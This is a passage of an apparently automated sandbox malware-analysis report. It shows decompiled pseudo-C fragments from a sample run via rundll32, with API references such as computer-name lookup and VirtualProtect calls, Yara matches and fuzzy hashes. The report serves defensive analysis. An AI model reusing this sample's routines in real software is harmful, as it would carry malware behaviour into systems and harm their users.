											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x100a348; // 0x428d5a8
													_t67 = _v28;
													_t40 = _t100 + 0x100b418; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                          0x01001f85
                          0x01001f8c
                          0x01001f8d
                          0x01001f8e
                          0x01001f8f
                          0x01001f95
                          0x01001f9a
                          0x01001fa3
                          0x01001fa6
                          0x01001fad
                          0x01001fb3
                          0x01001fb7
                          0x01001fbd
                          0x01001fc5
                          0x01001fc6
                          0x01001fcb
                          0x01001fcc
                          0x01001fce
                          0x01001fd1
                          0x01001fd2
                          0x01001fd3
                          0x01001fd9
                          0x0100206f
                          0x01002074
                          0x0100207b
                          0x01002085
                          0x0100208b
                          0x0100208d
                          0x01002093
                          0x00000000
                          0x01001fdf
                          0x01001fdf
                          0x01001fe6
                          0x01001fef
                          0x01001ff3
                          0x01001ff9
                          0x01001ffc
                          0x01002064
                          0x00000000
                          0x01001ffe
                          0x01001ffe
                          0x01002096
                          0x01002098
                          0x00000000
                          0x00000000
                          0x01002004
                          0x01002004
                          0x01002006
                          0x0100200b
                          0x0100200f
                          0x01002012
                          0x01002017
                          0x0100201f
                          0x01002020
                          0x01002021
                          0x01002023
                          0x01002027
                          0x0100202b
                          0x00000000
                          0x0100202d
                          0x01002031
                          0x01002036
                          0x0100203d
                          0x0100204d
                          0x0100204f
                          0x01002055
                          0x0100205a
                          0x0100209a
                          0x0100209a
                          0x010020a7
                          0x010020ab
                          0x010020b0
                          0x010020b6
                          0x010020bb
                          0x010020c5
                          0x010020c7
                          0x010020cd
                          0x010020cd
                          0x010020d0
                          0x010020d6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0100205a
                          0x00000000
                          0x0100205c
                          0x0100205c
                          0x0100205d
                          0x00000000
                          0x01002062
                          0x01001ffe
                          0x01001ffc
                          0x01001ff3
                          0x010020d9
                          0x010020d9
                          0x010020df
                          0x010020df
                          0x010020e8

                          APIs
                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,?,?,?,?,01003F35), ref: 01002047
                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052989D0,01003F35,?,?,?,?,?,?,?,01003F35,00000000,00000000,00000000,006D0063), ref: 01002085
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: QueryServiceUnknown_
                          • String ID:
                          • API String ID: 2042360610-0
                          • Opcode ID: 0e659ebf5b037890d72ae7ec5d1c2ca22ebc616238064b7f0409cc779ee775d6
                          • Instruction ID: 907fa6fbd9b0f048e220d87a5ba9a323c091b6139e2bffa6c5c20af2b13de35b
                          • Opcode Fuzzy Hash: 0e659ebf5b037890d72ae7ec5d1c2ca22ebc616238064b7f0409cc779ee775d6
                          • Instruction Fuzzy Hash: 7B517F75900219AFDB11CFE8C888DEEB7B9FF48700F058559FA45EB251DA31AD45CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010046CB Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E010046CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E010074FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x100a348; // 0x428d5a8
						_t20 = _t68 + 0x100b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E010065D1(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                          0x010046d1
                          0x010046d4
                          0x010046e4
                          0x010046ed
                          0x010046f1
                          0x010047bf
                          0x010047c5
                          0x010047c5
                          0x0100470b
                          0x01004710
                          0x01004714
                          0x0100471a
                          0x0100471f
                          0x01004726
                          0x01004735
                          0x01004735
                          0x01004739
                          0x0100473b
                          0x01004747
                          0x01004752
                          0x0100475d
                          0x01004761
                          0x0100476b
                          0x0100476f
                          0x01004771
                          0x01004776
                          0x0100477d
                          0x0100478d
                          0x0100478d
                          0x01004776
                          0x0100476f
                          0x0100478f
                          0x01004794
                          0x01004799
                          0x01004799
                          0x0100479c
                          0x010047a5
                          0x010047aa
                          0x010047aa
                          0x010047af
                          0x010047b4
                          0x010047b4
                          0x010047af
                          0x01004739
                          0x010047b6
                          0x010047bc
                          0x00000000

                          APIs
                            • Part of subcall function 010074FE: SysAllocString.OLEAUT32(80000002), ref: 0100755B
                            • Part of subcall function 010074FE: SysFreeString.OLEAUT32(00000000), ref: 010075C1
                          • SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SysFreeString.OLEAUT32(01003520), ref: 010047B4
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloc
                          • String ID:
                          • API String ID: 986138563-0
                          • Opcode ID: 46f935ee6975bd7d519561dfd3b9a2087ca873c49e2b512bc077c3daf93c2363
                          • Instruction ID: 6ba33eb753a2d376f50f5eb478ab499ad90b3eb09afcc8be67c94adc85e8b2c7
                          • Opcode Fuzzy Hash: 46f935ee6975bd7d519561dfd3b9a2087ca873c49e2b512bc077c3daf93c2363
                          • Instruction Fuzzy Hash: 29314E75500119AFDB22DF58C888CDBBBB9FBCA740B244598FA49DB250D731DD51CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01005634 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                          Download Yara Rule
                          C-Code - Quality: 50%
                          			E01005634(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x100a348; // 0x428d5a8
				_t2 = _t42 + 0x100b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x100a348; // 0x428d5a8
					_t6 = _t45 + 0x100b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x100a348; // 0x428d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x100b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                          0x01005640
                          0x01005641
                          0x01005647
                          0x0100564e
                          0x01005650
                          0x01005654
                          0x01005658
                          0x0100565a
                          0x01005663
                          0x01005669
                          0x01005671
                          0x01005673
                          0x01005677
                          0x01005679
                          0x01005686
                          0x0100568a
                          0x0100568f
                          0x01005695
                          0x0100569a
                          0x010056a2
                          0x010056a4
                          0x010056a6
                          0x010056ac
                          0x010056ac
                          0x010056af
                          0x010056b5
                          0x010056b5
                          0x010056b8
                          0x010056be
                          0x010056be
                          0x010056c5

                          APIs
                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01005671
                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010056A2
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Interface_ProxyQueryUnknown_
                          • String ID:
                          • API String ID: 2522245112-0
                          • Opcode ID: 7c3f5cb3eafbc20e6c26cca6cd82badac0e1fdb0ddfe4136eb66231e93765856
                          • Instruction ID: aeb18488df6b32962e5210eacf49980b8714aa31a7f4262ebcb0b44d1f059b11
                          • Opcode Fuzzy Hash: 7c3f5cb3eafbc20e6c26cca6cd82badac0e1fdb0ddfe4136eb66231e93765856
                          • Instruction Fuzzy Hash: 6D216075A00609EFCB01CFA4C848D9AB779EF89704B108694F941DB314DB31EE41CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73223 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 05B73253
                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 05B7329A
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                          • String ID:
                          • API String ID: 552344955-0
                          • Opcode ID: 74a2fc525daf4e7e55f87bf546fd48349d9f8d53e05ddeec4cf205c724fadd53
                          • Instruction ID: 4c2ff7282ab99b0cf8f16e5c3776fc560d0802820e762272d086636ab22dd4db
                          • Opcode Fuzzy Hash: 74a2fc525daf4e7e55f87bf546fd48349d9f8d53e05ddeec4cf205c724fadd53
                          • Instruction Fuzzy Hash: 78116571A0020CBBDB11DFA9C858BAEBBF9FF85650F2044D9E92197240EB74EA05DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B79370 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,05B702F2,69B25F44,?,?,00000000), ref: 05B793AD
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,05B702F2), ref: 05B7940E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$FileFreeHeapSystem
                          • String ID:
                          • API String ID: 892271797-0
                          • Opcode ID: 1fb9fb6ad4e6f16b1131e20a59945ab574b459a4694db75dd1f0f40231956555
                          • Instruction ID: 258a36a8114813a1c78ac61867d20f534714cc6c44689112bd8ccca9b6e20af2
                          • Opcode Fuzzy Hash: 1fb9fb6ad4e6f16b1131e20a59945ab574b459a4694db75dd1f0f40231956555
                          • Instruction Fuzzy Hash: 12110AB591410CFBCB10EBA4D949AAEBBFDEB08615F1000A2A511E7180DB74BB44EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001240 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 01001267
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SafeArrayDestroy.OLEAUT32(?), ref: 010012B7
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$CreateDestroyFreeString
                          • String ID:
                          • API String ID: 3098518882-0
                          • Opcode ID: 38b9de722de5586eaacefe4303cee9b11d654161b15de265073ecc38b2c4312c
                          • Instruction ID: 42bbf9f71cd5375b02e6cbef58b5152fe1019d16c72d4b44024b9ce2b7e26d6b
                          • Opcode Fuzzy Hash: 38b9de722de5586eaacefe4303cee9b11d654161b15de265073ecc38b2c4312c
                          • Instruction Fuzzy Hash: 1E115275A0020ABFDB02DFE8CC049EEB7B9EF08710F008025FA44E7161E7759A558B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010041FA Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010041FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E010061FC(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E01002AE4(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t21 = E01004822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
						_t22 = _t21;
					}
					HeapFree( *0x100a2d8, 0, _t25);
				}
				return _t22;
			}












                          0x010041fa
                          0x0100420b
                          0x0100420f
                          0x0100426a
                          0x01004211
                          0x01004218
                          0x01004220
                          0x01004223
                          0x01004228
                          0x0100422c
                          0x01004232
                          0x0100423a
                          0x0100423d
                          0x01004250
                          0x01004255
                          0x01004255
                          0x01004260
                          0x01004260
                          0x01004271

                          APIs
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,052993F4), ref: 01004232
                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,052993F4), ref: 01004260
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                          • String ID:
                          • API String ID: 1500278894-0
                          • Opcode ID: 1bc67bf166fb0109380b16f816eefd5e66f453545e283967bd2073e5bb688b51
                          • Instruction ID: 6a7686ffbbda628daa52b550cdc0567d691aa471c0fc0e88d7eeeeabcb73fb12
                          • Opcode Fuzzy Hash: 1bc67bf166fb0109380b16f816eefd5e66f453545e283967bd2073e5bb688b51
                          • Instruction Fuzzy Hash: 9901713120024ABBEB225F989C44E9F3BB9FF85714F400425FA84DA1A1DA72D954D754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010014F1 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SysAllocString.OLEAUT32(01007283), ref: 0100150A
                            • Part of subcall function 010046CB: SysFreeString.OLEAUT32(?), ref: 010047AA
                          • SysFreeString.OLEAUT32(00000000), ref: 0100154B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$Free$Alloc
                          • String ID:
                          • API String ID: 986138563-0
                          • Opcode ID: 4884c7d200eb54637bbdcbd1db1b59c26925aeaad5b8f6a737d3706476f9a4b0
                          • Instruction ID: fc2d8e4f67b7e5f3ccfbf80454b8849f452066c3dc461c5340bb34f75a4200ca
                          • Opcode Fuzzy Hash: 4884c7d200eb54637bbdcbd1db1b59c26925aeaad5b8f6a737d3706476f9a4b0
                          • Instruction Fuzzy Hash: 63014F3550110ABFDF529FA8D904DEF7BB9EF48710F044021FA49E7120E6319A15CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010022D7 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E010022D7(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E01006D63(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E01006C2C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                          0x010022dc
                          0x010022e7
                          0x010022e9
                          0x010022ef
                          0x010022f1
                          0x010022f6
                          0x010022ff
                          0x01002303
                          0x0100230c
                          0x01002310
                          0x0100231f
                          0x01002312
                          0x01002313
                          0x01002318
                          0x01002318
                          0x01002310
                          0x01002303
                          0x01002328

                          APIs
                          • GetComputerNameExA.KERNEL32(00000003,00000000,010057B5,00000000,00000000,?,75BCC740,010057B5), ref: 010022EF
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetComputerNameExA.KERNEL32(00000003,00000000,010057B5,010057B6,?,75BCC740,010057B5), ref: 0100230C
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ComputerHeapName$AllocateFree
                          • String ID:
                          • API String ID: 187446995-0
                          • Opcode ID: f7f733a94c520967cacd242d4486d4ff4c596e329418bc29948976e13e2fe526
                          • Instruction ID: 1755316843eba7ac1b971349ce5eb55ed14683b32bd4f204e9c5f00ce93a8a9c
                          • Opcode Fuzzy Hash: f7f733a94c520967cacd242d4486d4ff4c596e329418bc29948976e13e2fe526
                          • Instruction Fuzzy Hash: 6DF05476A0010AFAF723D6A98C04FAF7BFDDBC5650F114096E984D3181EAB5DA058771
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010078BF Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010078BF(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E01006D63(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x100a348; // 0x428d5a8
					_t5 = _t11 + 0x100ba70; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x100a348; // 0x428d5a8
					_t6 = _t14 + 0x100b900; // 0x6d0063
					_t16 = E01007928(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E01006C2C(_t20);
				}
				return _t18;
			}









                          0x010078d5
                          0x010078d9
                          0x01007919
                          0x010078db
                          0x010078df
                          0x010078e6
                          0x010078ee
                          0x010078f4
                          0x010078ff
                          0x01007908
                          0x0100790e
                          0x01007910
                          0x01007910
                          0x0100791e

                          APIs
                          • lstrlenW.KERNEL32(76CDF710,00000000,?,010071A6,00000000,?,76CDF710,00000000,76CDF730), ref: 010078C5
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • wsprintfW.USER32 ref: 010078EE
                            • Part of subcall function 01007928: memset.NTDLL ref: 0100794B
                            • Part of subcall function 01007928: GetLastError.KERNEL32 ref: 01007997
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                          • String ID:
                          • API String ID: 1672627171-0
                          • Opcode ID: 3a04c17faba3daa14049213ddea1e6fbda166bc875b42d86b569f3f9e27121e2
                          • Instruction ID: c4ffbc912acbfe1cdd484199376ad74b524fc17367294631b9ed02af7407686e
                          • Opcode Fuzzy Hash: 3a04c17faba3daa14049213ddea1e6fbda166bc875b42d86b569f3f9e27121e2
                          • Instruction Fuzzy Hash: D8F05932601215AFE323AB28DC08FEF37DCEF84711F058422F6C4C7191CA3AA9118760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7E869 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B7E873
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B7E8AF
                            • Part of subcall function 05B61A0A: lstrlen.KERNEL32(?,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61A58
                            • Part of subcall function 05B61A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A6A
                            • Part of subcall function 05B61A0A: lstrcpy.KERNEL32(00000000,?), ref: 05B61A79
                            • Part of subcall function 05B61A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A8A
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                          • String ID:
                          • API String ID: 1872894792-0
                          • Opcode ID: 5d27b7f9ad57be937a3f587b222e635b4d8dd2e32a34f74e163130fe8c378faf
                          • Instruction ID: 7f2bffe77fe7cdf62362a5aaa4174e273e3643f03b367177f3867c155fca975f
                          • Opcode Fuzzy Hash: 5d27b7f9ad57be937a3f587b222e635b4d8dd2e32a34f74e163130fe8c378faf
                          • Instruction Fuzzy Hash: 6CF0A0362212199F87206F289889C79BBADFF8912631551DBE92663310CA76BC41D6D0
                          Uniqueness

                          Uniqueness Score: -1.00%

